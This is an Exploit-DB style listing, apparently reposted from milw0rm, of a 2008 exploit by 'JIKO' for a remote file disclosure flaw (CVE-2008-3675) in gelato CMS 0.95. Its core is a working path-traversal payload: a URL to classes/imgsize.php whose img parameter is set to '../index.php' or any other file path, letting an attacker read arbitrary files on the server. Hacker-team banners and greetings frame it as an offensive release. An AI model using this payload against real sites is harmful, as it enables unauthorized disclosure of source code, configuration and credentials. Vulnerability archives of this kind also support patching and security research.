[] NeoSense

gelato CMS 0.95 - 'img' Remote File Disclosure

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2008-08-12 
date_updated: 2016-12-20 
verified: 1 
codes: OSVDB-47456;CVE-2008-3675 
tags: 
aliases:  
screenshot_url:  
application_url: 

=---------------------------------------------=
=                ,.:oO0^-^0Oo:.,              =
=                      JIKO                   =
=                '':0Oov-voO0:''              =
=---------------------------------------------=
----------------------=JIKO=-------------------
| Autor    :> jiko
| Home     :> WwW.No-Exploit.CoM
| Script   :> gelato CMS
| Bug      :> Remote File Disclosure Vulnerability
| Download :> http://www.gelatocms.com/
_______________________________________________
=                   JIKI TEAm                 =
_______________________________________________
| Exploit:
.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
~EX
.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
| Greetz :
.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
----------------------=JIKO=-------------------
=---------------------------------------------=
=                   JIKI TEAm                 =
=---------------------------------------------=

# milw0rm.com [2008-08-13]